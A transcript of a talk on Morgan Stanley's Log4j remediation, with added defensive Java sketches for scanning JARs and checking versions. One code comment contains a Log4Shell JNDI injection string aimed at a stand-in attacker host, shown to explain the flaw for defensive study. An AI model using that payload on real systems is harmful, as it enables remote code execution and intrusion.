Log4j Hygiene

Investigating Log4j vulnerabilities within the Morgan Stanley software real estate.


Leveraging various tools to scan and provide reports for remediation. The ideas and tools are neither Log4j-specific nor Morgan Stanley-specific.


Paul Fox

Distinguished Engineer, Executive Director Institutional Securities Tech, Morgan Stanley

Transcript

00:00:12

Welcome to this presentation on the Log4j vulnerability and the remediation exercise that took place in Morgan Stanley from the middle of December 2021. During the course of this exercise, I estimate about 40,000 pieces of work were executed, and no animals were harmed during this production. So, a quick table of contents: who am I? Morgan Stanley. Some information about Log4j in case you're not aware of what it is. Some comments by Gene Kim from when we had a pre-presentation discussion, a little bit of the story as it unfolded internally, and many of the interesting aspects of the questions and issues that arose during the exercise of discovering data and remediating.

00:01:05

So, who am I? I've been at Morgan Stanley for more than 20 years, working in production plant, engineering, configuration management, and many tools, and really with an interest in root cause analysis: why do things go wrong? And when something goes wrong, what's the chance of it happening again? That fits quite nicely and squarely with things like vulnerability management and software quality. I work with many people solving some of these problems, trying to understand them, helping people out with career aspirations and talent spotting, so hopefully a general interest in software quality, security, licensing and standards. They're all very similar, related questions about software: what is it made of? What are the components? And how do they apply to the application? With such a vast software real estate in the organization, it opens itself up to a lot of data mining, with some very interesting patterns becoming apparent due to the many years of software and many types of software ongoing in such a large organization.

00:02:17

And really, all of these things eventually culminate in some of the big-ticket items: Struts from a few years ago, the big Equifax issue with a piece of open source, and now, as of a few months ago, Log4j. And these are escalating in terms of number, frequency and severity: H2, Spring4Shell and others. So with all of this experience and all these tools, it's got to be easy. It's not as easy as it would at first appear. Okay, so before we go into the details, let's talk about Morgan Stanley. It's an investment bank: more than a hundred thousand employees, 20,000-plus developers, 25 years of software, new, old, legacy, pretty much every technology ever. And over the last many years it has embraced continuous integration pipelines, DevOps, agile, all of the buzzwords, to help improve software quality and improve throughput and velocity.

00:03:18

We have our own bad practices, like everybody. We're an attack victim given the nature of our business: lots of data and lots of dollars. We're proud of what we do, like everybody. Millions of dollars of trades and money move through all the machinery every day; that's millions of trades and so much complexity. So this means we've got a lot of diversity in terms of software. Generally, people don't like to work on legacy; they like to work on the latest and greatest things. Developers want to develop, not fix things, and there is more use of open source and industry standards, which leads to more surface area. So as technologists, we consider ourselves to work for an IT company that helps to sell stocks and shares as a business. The traders think of us as a bank, and IT is just a tool. So we have a diversity of opinion or approach to doing things. And cyber is happening more often, with more impact, more eyes, more effort by the bad guys. We, like all organizations, are a target. We don't want to be in the headlines for the wrong reasons.

00:04:31

Just a brief recap on Log4j if you're not aware of it: it's a hugely popular logging library used by almost all Java applications. It has a long history, and pretty much most applications use it. The recently publicized vulnerability got the maximum score from the people who rate and grade these things. It basically allows remote code execution, which means that if you've got an external, web-facing Java application, a user could sit there and type in the right magic characters in order to download code and execute it on your systems. Obviously not a good thing to have happen, and because many Java applications tend to be web-based services, that is even worse. The vulnerability sat in the wild for years until it was uncovered, so even before publication I guess the bad actors were busy writing the tools to start scanning the world and attack or investigate every website and every organization. Everyone, big or small, moved very quickly after the public announcement to investigate, remediate or block these attacks. The attack itself turned out to be very easy and had very little in the way of preconditions.
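To make the "very little in the way of preconditions" point concrete, here is a minimal sketch, not taken from the talk, of how an ordinary log statement could trigger the vulnerability on an unpatched Log4j 2.x release; the class and header names are illustrative only.

```java
// Minimal sketch (illustrative names, not code from the talk): on vulnerable
// log4j-core 2.x releases, logging attacker-controlled text such as an HTTP
// header is enough, because the library expands ${jndi:...} lookups found in
// the formatted message and can end up fetching and executing remote code.
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginAudit {
    private static final Logger LOG = LogManager.getLogger(LoginAudit.class);

    // userAgent arrives straight from the incoming request.
    public void recordLogin(String user, String userAgent) {
        // A value like "${jndi:ldap://attacker.example/x}" is resolved by the
        // vulnerable library itself; the application code looks entirely benign.
        LOG.info("login user={} agent={}", user, userAgent);
    }
}
```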

00:05:47

So if you read the internet guides on this, they show how simple it is to do. The mere presence of the JAR file in an application is enough to presume that the application is at risk of attack. I'm guilty. So, the Log4j story within Morgan Stanley: I like to think of it as having a beginning, a middle and an end. It started for myself one Friday morning with some emails coming in and me trying to figure out what I was going to do for the day. The subsequent days and weeks were a lot of concentrated work by many teams and people: collecting data, interpreting it, getting the message out and getting accountability for application remediation. And then, as we got to the end of the exercise, interesting things came around. At some point the company wanted to take a firm decision that we were going to destroy the copies of the software in the organization, knowing that nothing was using it. That required a lot more analytics and discussion in order to figure out: are we ready? Have we got all the data and signs that we need?

00:07:04

I had a conversation with Gene Kim before doing this presentation, and it was an interesting conversation, because I guess to an outsider remediating this issue is really very simple: there is a vulnerability in the library, so just fire off an email to everybody and tell them to go fix it. I said it wasn't as simple as that. That is the high-level goal: you want people to go and fix it. So how many ways are there for it to go wrong? If you did happen to take that approach, maybe in a small organization it's viable, but in a very large organization you really want to be confident that you've covered all your bases, that all applications are properly investigated and remediated, and that you don't have legacy sitting in a corner somewhere that everybody has forgotten about and that is open to attack. So, do you know all the applications you have?

00:08:02

Do you know who owns them? Who's accountable? In a large organization, that data is changing as people come and go and all sorts of things happen. How many are going to understand the email and actually respond? People are busy doing the day job; you are now asking them to do some high-priority thing. And for all of us on the exercise, it was a lot of learning to understand the nuances. Whatever the answers are that come back, do you trust them? An example: an application team may say, we looked at our code, there is no Log4j. Do you trust that answer? The answer for myself is no. If the data, the tools and the probes that exist in our organization demonstrate that it is using the technology, even if the application owner doesn't believe it is, we need to trust the tools and the data being collected. Whether you use Log4j or not is not necessarily obvious. The layering of software components and libraries can mean that one of the components you are using is itself using Log4j, and you need to remediate that component. So it's either a direct dependency or an indirect, transitive dependency, and that can get quite complicated for application owners who may not actually be very familiar with their own application.
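As an illustration of why "we looked at our code, there is no Log4j" cannot simply be taken on trust, one common detection technique, sketched here rather than the firm's actual probes, is to look inside the JARs an application actually ships for the Log4j JndiLookup class, including copies bundled one level deep inside fat JARs. Packages relocated by shading would need additional handling.

```java
// Hedged sketch of a common detection technique (not the firm's tooling):
// look inside an application's JARs for the Log4j JndiLookup class, which
// flags a bundled copy even when no build metadata mentions Log4j at all.
// Nested JARs (fat/uber JARs) are checked one level deep.
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Path;
import java.util.Enumeration;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.jar.JarInputStream;

public class JndiLookupScanner {
    private static final String MARKER =
            "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    public static boolean containsLog4jCore(Path jarPath) throws IOException {
        try (JarFile jar = new JarFile(jarPath.toFile())) {
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry entry = entries.nextElement();
                if (entry.getName().equals(MARKER)) {
                    return true;                        // direct or bundled copy
                }
                if (entry.getName().endsWith(".jar")) { // nested JAR, one level
                    try (InputStream in = jar.getInputStream(entry);
                         JarInputStream nested = new JarInputStream(in)) {
                        JarEntry inner;
                        while ((inner = nested.getNextJarEntry()) != null) {
                            if (inner.getName().equals(MARKER)) {
                                return true;
                            }
                        }
                    }
                }
            }
        }
        return false;
    }
}
```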

00:09:24

Lack of proof means you're still susceptible to an attack. The bad guy doesn't care how good or bad our internal processes are; they can just fire off a script and demonstrate an application weakness. We don't want to be in the situation where we believe we've done a good job and provably we haven't. Tracking hundreds or even thousands of remediations based around some honor system has too many weak spots. People answer to the best of their knowledge on the results, and you <inaudible> to keep track of everything going on, and occasionally you need to re-question everybody, because maybe some of the boundary conditions changed. So in the beginning it was a quiet Friday, getting ready to wind down for Christmas, and an email arrived asking for details on applications using Log4j. I headed into my tool and sent out a quick reply: here's the link, help yourself. And then another email arrived, and another.

00:10:26

So I started thinking: by the time multiple emails are coming in, that tends to indicate high severity, and I started reading up on the issue. And yeah, it was a big one. Fundamentally, the questions everybody was asking at the beginning of this exercise were: what is our exposure? Which applications are impacted? And the answer, generally speaking, is all of them or most of them, which is a very vague answer, and not a good one. Unless you can answer the question very scientifically, it's going to be a bad day, bad week, bad month. Now, most of what I'm talking about here is a personal view, but behind this is teamwork: cross-silo, cross-division, getting anyone and everyone to do whatever it takes to get results. We have two key technologies in the firm which can help answer these questions. One is called AFS, the Andrew File System.

00:11:24

It's a globally distributed network filesystem where all the applications reside, and we have our continuous integration system, called Train, where all software is built and deployed. And a bit of a footnote there: the word "all" doesn't mean whatever you think it means. It's nice to say all of our software is built on an SDLC-approved continuous integration process, but not all software is built by Morgan Stanley. We have external vendor applications, legacy applications, things that are just not doing the right thing. So we need to be cautious when we consult these systems. And I've deliberately simplified in mentioning AFS and Train, because we have other pieces of technology for deploying applications, such as Docker, which adds more complexity to the question and answer.
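Because "all" does not cover vendor and legacy software, build-system metadata can be complemented by looking at what is physically on disk. A hedged sketch follows; the root path and filename pattern are purely illustrative and not the firm's actual layout.

```java
// Hedged sketch (illustrative paths and patterns): walk a deployment tree on
// the shared filesystem and list JARs whose names suggest log4j-core, as a
// complement to whatever the CI metadata says is deployed there.
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.List;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import java.util.stream.Stream;

public class DeployTreeScan {
    // Candidate pattern: any log4j-core 2.x JAR, to be checked further.
    private static final Pattern CANDIDATE =
            Pattern.compile("log4j-core-2\\.(\\d+)(\\.\\d+)*\\.jar");

    public static List<Path> findCandidateJars(Path root) throws IOException {
        try (Stream<Path> walk = Files.walk(root)) {
            return walk.filter(Files::isRegularFile)
                       .filter(p -> CANDIDATE.matcher(p.getFileName().toString()).matches())
                       .collect(Collectors.toList());
        }
    }

    public static void main(String[] args) throws IOException {
        // Hypothetical mount point; in practice this would be driven by the
        // application catalog rather than a single root.
        for (Path hit : findCandidateJars(Path.of("/deploy/apps"))) {
            System.out.println(hit);
        }
    }
}
```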

00:12:18

So it was Christmas, or nearly Christmas, and the meetings had started. The initial meetings were about getting lots of people together to try and understand the gravity of the issue and what the first steps in remediating were. I would describe the beginning of an exercise like this as all very opaque. We don't understand the true impact of the vulnerability, we don't know how many applications are affected, and we are probably all guessing how long it's going to take to remediate the ones, the tens, the hundreds and thousands of applications. So many meetings started happening within the first few hours, and then for probably the next week there were regular meetings and status updates: what are we doing? What have we collected? Where are we going? And that built up a strong hierarchy and a strong sense of presence by those concerned: senior management, the cyber team, the hunt team, the software developers and many other people.

00:13:25

In looking at all of the applications, the primary focus was on anything that is external-facing. Anything that could be attacked from morganstanley.com is a very high priority, and anything that is a vendor application, something not built by Morgan Stanley, would also be of high interest, because somebody needs to reach out to the vendor and find out what they are doing: are they issuing a patch? So suddenly a lot of work was going on. Whilst most software in the firm is built internally, sits on our CI system, and is covered by data catalogs that let us know which applications may be impacted, I decided to go off at a tangent and start looking at the external applications to see what evidence existed to demonstrate they were using Log4j. So this leads to a series of questions. Really, what is a vendor-based application?

00:14:22

What is a vendor system? How do we catalog these? Are they correctly cataloged? What can we tell by inspection of the applications? Generally speaking, we do a good job of cataloging the applications, because that data is used in so many different ways internally, but if an external application was not marked as an external or vendor application, that might mean we skip over it. We may not notice that we don't have the metadata to tell us whether it uses Log4j or not; we wouldn't know what to do. So a very important part of the exercise is: are the catalogs up to date? Are they trustworthy? In starting to look at the vendor applications, there were definite signs of the offending versions of Log4j, which was very useful and confirmed that we could detect them. We couldn't tell whether the application itself was vulnerable; merely using the software doesn't necessarily imply the application is vulnerable, but it's a very strong likelihood. In parallel to this data gathering and analysis, vendor engagement was taking place. And this is an interesting item: a large organization deals with many businesses, some big, some small, the IBMs, the Oracles, the software component suppliers, the cloud businesses, whatever. It turns out that in a company of our size we deal with tens of thousands of organizations that supply everything from simple little libraries to major applications.

00:15:55

So they needed to reach out to the vendors in order to find out what their take was on mitigation or remediation. And although I had nothing to do with that part, it was interesting watching it, because it culminated in thousands of emails being sent out asking for responses from the application companies. Also, bearing in mind that we are a regulated industry, the regulators were interested in understanding what our exposure was. So trying to pull this data together, whether it's the conversations with external vendors or the internal applications, required responses to the regulators about where we were in the discovery process.

00:16:39

Whilst we were busy trying to contact the companies that supply us with software, of course our clients were busy trying to contact us. How is Morgan Stanley doing? Are we impacted? What's our response? Where are we? One can imagine the torrent of incoming and outgoing traffic, and that communication required careful management. Certainly those of us on the technical side were not spokespeople for the organization; luckily people don't reach out to us to ask for our opinion on what's going on. But managing that communication in a mature fashion is, you know, quite something else.

00:17:18

Okay, so on the technical side, we ended up creating a repeatable process. We're not only discovering the applications; we need to provide the information to the application owners and to the people monitoring the situation in the firm. This is not something you want to do by hand, collecting spreadsheets and merging data; you need an automation system that can collect this stuff and generate reports, and free humans up to get on with it, knowing we would need to track this to zero. This was not a desirable program; this was a mandatory program. We needed to eradicate this, so it was going to stick around for a while until all the due diligence and remediation had happened. This basically entailed a load of standard report generation and data acquisition, and a lot of caching. I was writing a lot of the tooling, and having a report that takes more than 24 hours to generate results is not really desirable.
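One hedged illustration of the "a lot of caching" point: keying scan verdicts on a file's path, size and modification time means that unchanged JARs are not re-inspected on every report run, which is the kind of thing that keeps a daily report from running past 24 hours. The scanner it delegates to is assumed to be something like the JndiLookupScanner sketch earlier; none of this is the firm's actual tooling.

```java
// Hedged sketch of a verdict cache for repeated report runs: cache each
// result keyed on (path, size, mtime) and only rescan files that changed.
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

public class ScanCache {
    // Identity of a file's content for caching purposes: path + size + mtime.
    private record Key(String path, long size, long mtimeMillis) {}

    private final Map<Key, Boolean> verdicts = new ConcurrentHashMap<>();

    public boolean isFlagged(Path jar) throws IOException {
        Key key = new Key(jar.toString(),
                          Files.size(jar),
                          Files.getLastModifiedTime(jar).toMillis());
        Boolean cached = verdicts.get(key);
        if (cached != null) {
            return cached;                      // unchanged since the last run
        }
        // Assumed helper from the earlier sketch; any expensive check fits here.
        boolean flagged = JndiLookupScanner.containsLog4jCore(jar);
        verdicts.put(key, flagged);
        return flagged;
    }
}
```

In practice the map would be backed by something persistent so verdicts survive across report runs and collector restarts.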

00:18:13

So a lot of work was put in to ensure it could run reasonably fast. The data we needed covers: what's running? What are the applications? What are the processes? What source code references these versions of Log4j? What images exist? What old releases exist and need to be destroyed? We really wanted to ensure that no old application prior to remediation could suddenly be fired up, because that would reintroduce the vulnerability into the ecosystem. It's a multidimensional view to help isolate the applications and owners, not just for remediation but for accountability. And one of the interesting things that happened at the beginning of the exercise was the question of which is the correct version of Log4j to use. In the early days of this remediation exercise, the Apache Foundation was releasing brand-new versions which were subsequently found to have vulnerabilities themselves, and so the version guidance kept changing daily; trying to keep it in your head was becoming impossible. So we needed a central place that would catalog which are the bad versions and which are the good, acceptable versions.
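Here is a hedged sketch of that "central catalog of good and bad versions" idea. The minimum patch levels below reflect the public Apache advisories as they stood in early 2022 (2.17.1 on the mainline, 2.12.4 and 2.3.2 on the older Java lines); the whole point of centralizing this is that those numbers kept changing, so a production version would be data-driven rather than hard-coded.

```java
// Hedged sketch of a central "is this log4j-core version acceptable?" check.
// The minimum patch levels mirror the public Apache advisories of early 2022
// (2.17.1 mainline, 2.12.4 for Java 7, 2.3.2 for Java 6). A real catalog
// would load these from data, because the guidance changed repeatedly.
import java.util.List;

public class Log4jVersionPolicy {

    private static final List<int[]> MINIMUM_GOOD = List.of(
            new int[]{2, 17, 1},   // mainline
            new int[]{2, 12, 4},   // Java 7 maintenance line
            new int[]{2, 3, 2}     // Java 6 maintenance line
    );

    /** True if a log4j-core 2.x version string is at or above the acceptable
     *  patch level for its maintenance line. */
    public static boolean isAcceptable(String version) {
        int[] v = parse(version);
        for (int[] min : MINIMUM_GOOD) {
            if (v[0] == min[0] && v[1] == min[1]) {   // same line, e.g. 2.17.x
                return v[2] >= min[2];
            }
        }
        // Anything not on a listed line is acceptable only if it is newer
        // than the newest fixed mainline release.
        return compare(v, MINIMUM_GOOD.get(0)) > 0;
    }

    private static int[] parse(String version) {
        String[] parts = version.split("\\.");
        int[] v = new int[3];
        for (int i = 0; i < 3 && i < parts.length; i++) {
            String digits = parts[i].replaceAll("\\D.*$", "");
            v[i] = digits.isEmpty() ? 0 : Integer.parseInt(digits);
        }
        return v;
    }

    private static int compare(int[] a, int[] b) {
        for (int i = 0; i < 3; i++) {
            if (a[i] != b[i]) {
                return Integer.compare(a[i], b[i]);
            }
        }
        return 0;
    }
}
```

Under those assumptions, `isAcceptable("2.14.1")` and `isAcceptable("2.17.0")` return false while `isAcceptable("2.17.1")` returns true.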

00:19:20

A lot of the early work was about senior management and data collection, but ultimately this data is all meant for the developers to remediate apps. They had no idea this was going to hit them in the couple of weeks just before Christmas, and a lot of communication, education and knowledge needed to be disseminated to get people to the same level of understanding. The program itself was split into a tactical and a strategic approach. The highest-priority applications needed to be fixed prior to Christmas, so that's about a two-week timeframe, and then a slightly more measured approach followed in 2022, post-Christmas and post-New Year. That worked really well to focus on getting early results, proving the methodology, and then following through in January. The next days turned into weeks, and the weeks into months; whilst the original goal was full remediation by around the end of January, things just tend to take a little bit longer than expected. So as of this presentation, which is dated in May, we've pretty much reached the end of the line: the remediation has completed, and that happened sometime in April.

00:20:35

So what were some of the support questions that came up along the way? One of the most interesting ones I saw in my inbox was: why is my .NET application showing up in the report? The answer turned out to be that it was a .NET application that didn't use Java, but the Docker image in which it was running had a Java component, and that Java component had the issue. There were a lot of conversations and questions around Docker images. Once we identified the family of images that had Log4j in them and needed to be rebuilt and destroyed, it turned out that nobody actually knew how to destroy one. The use of Docker technology within the firm is relatively new, in the last few years, and nobody had really given much thought to at-scale deletion of images. So a lot of conversations went on with the Docker team to educate everybody on how to do the deletion and to handle some bugs which nobody had seen before.

00:21:31

In doing that, another issue was people remediating things and then saying: why am I still on the report? The report is pulling in data which is often a few days out of date, so it can take a few days for things to drop off. Trying to explain this to people time and time again is really difficult, but it did highlight later on in the workflow that as people were remediating, they really wanted hard real-time updates to the spreadsheet. They knew they were accountable and they wanted the positive feedback that they had been dropped from the report. To me, as an implementer of some of this tooling, it demonstrated that as you get closer to the finishing line, the demand for hard real-time data increases, and the technical implementation of that gets much more complicated. If you're generating a report and the data is a few days or a few weeks out of date, people are okay with that.

00:22:24

But when people want the data within 24 hours or less, the tool needs to do more polling, more probing, more computation, and that is actually quite a stretch. Now, I'm aware that we're running out of time in this presentation, so unfortunately I'm going to have to fast-forward over the subsequent slides. One of the interesting facets of this investigation is that whilst we spent a lot of time early on generating the raw data for people to consume, somebody put together a web service, built out of bash shell of all things, to help people query the data. I thought it was a really innovative and very useful tool, and I was very proud to see that somebody had spent the time to do that. I actually took that code and enhanced it manyfold, because having a central portal that people could go to, rather than emailing spreadsheets that would inevitably be days out of date by the time you looked at them, and being able to look at the live data at the point it's being consumed and generated, turned out to be really useful. That system is now being reused for other vulnerabilities and other hygiene exercises.

00:23:34

So out of the chaos that ensued from Log4j, we've built a data collector that is reusable for other vulnerabilities, and the end-user experience is now the same, with a lot of smart features available in the system. What are some of the takeaways from this whole exercise? I've listed a whole bunch of things. In the heat of the moment, when you're trying to generate data, everybody's looking at it and everybody's asking questions, there's a lot of similarity no matter the organization or the problem: you generate a report and people consume it, but then they start asking, what does this column mean, and why is that row there? I'll just stick for the moment with the very bottom item, which is: focus on success, not failure. We had thousands of line items that needed to be fixed, and people were being hounded because they still had one thing left to do.

00:24:29

Even if they'd fixed 99, the one thing that was left was the main focus. Being able to show the positive work that people were doing can make us all feel good as technologists, that people are actually doing what they're being asked to do, whereas senior management may focus on: has the risk been eradicated? We need to be fair to the effort thrown at this by the developer teams. So my apologies, I've run out of time. I'd love to talk about this for much, much longer, but I'm going to have to stop here. Thank you all very much for your time, and I hope to speak to you in person at some point in the future.